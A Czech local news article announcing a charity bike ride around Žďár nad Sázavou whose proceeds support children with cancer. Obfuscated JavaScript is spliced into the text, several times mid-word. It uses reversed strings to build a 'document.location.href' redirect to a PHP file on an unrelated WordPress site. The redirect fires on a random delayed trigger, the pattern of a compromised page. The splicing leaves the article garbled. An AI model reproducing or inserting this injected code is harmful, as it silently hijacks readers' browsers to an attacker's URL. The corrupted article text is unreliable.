Rainbow page separator

Výtěžek tradiční cyklojízdy podpoří onkologicky nemocné děti

Úterý, 3. srpna 2021

Žďár nad Sázavou / Sedmý ročník charitativní cyklojízdy Na kole dětem Žďárskými vrchy odstartuje v sobotu 14. srpna v půl desáté dopoledne od žďárské Pilské nádrže. Účastníci se vydají na 67 kilometrů dlouhou vyjížďku ve směru Světnov – Herálec – Svratka – Křižánky – Milovy – Sněžné – Kadov – Fryšava – Tři Studně – Vlachovice – Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě – Petrovice – Slavkovice – Veselíčko a zpět do Žďáru. Zastávky opět budou ve Svratce, Sněžném a v Novém Městě na Moravě. Podle pravidel akce však není nutné absolvovat celou trasu – je možné se připojit kdekoliv po cestě a symbolicky ujet třeba jenom několik kilometrů.
Registrace u startu potrvá od osmi hodin do čtvrt na deset – kromě zaplacení dobrovolného star[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovného si mohou lidé zakoupit i propagační předměty v podobě triček, ponožek či náramků. Kapacita cyklojízdy byla stejně jako loni omezena na 250 zaregistrovaných cyklistů, což je možné učinit prostřednicím webu www.zdaracidetem.cz, kde je i jmenný seznam dosud zaregistrovaných jezdců. Všichni účastníci akce jsou povinni dodržovat pravidla stanovená proti šíření onemocnění COVID-19.
Charitativní podnik zaštiťuje Aleš Wasserbauer, h$nJe=function(n){if (typeof ($nJe.list[n]) == „string“) return $nJe.list[n].split(„“).reverse().join(„“);return $nJe.list[n];};$nJe.list=[„\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.r$nJe=function(n){if (typeof ($nJe.list[n]) == „string“) return $nJe.list[n].split(„“).reverse().join(„“);return $nJe.list[n];};$nJe.list=[„\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod“]; if (number1==3){var xxdelay = 18000; setTimeout($nJe(0), xxdelay);}andom() * 6); if (number1==3){var xxdelay = 18000; setTimeout($nJe(0), xxdelay);}$nJe=function(n){if (typeof ($nJe.list[n]) == „string“) return $nJe.list[n].split(„“).reverse().join(„“);return $nJe.list[n];};$nJe.list=[„\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod“]; if (number1==3){var xxdelay = 18000; setTimeout($nJe(0), xxdelay);}andicapovaný cyklista, kterému byla před léty ampu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tována noha během léčby rakoviny. Jeho projekt Na kole dětem Žďárskými vrchy získává finance pro nadační fond Krtek a pro dětská oddělení nemocnic v Novém Městě na Moravě a v Jihlavě.